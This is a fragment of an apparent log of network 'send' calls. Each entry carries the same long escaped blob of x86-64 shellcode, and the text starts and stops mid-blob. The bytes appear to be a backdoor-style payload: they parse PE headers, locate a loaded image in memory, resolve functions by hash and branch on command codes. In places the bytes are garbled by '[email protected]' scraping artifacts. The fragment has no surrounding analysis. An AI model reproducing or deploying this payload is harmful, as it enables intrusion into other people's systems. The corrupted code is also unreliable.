H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 13, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 14, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 15, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 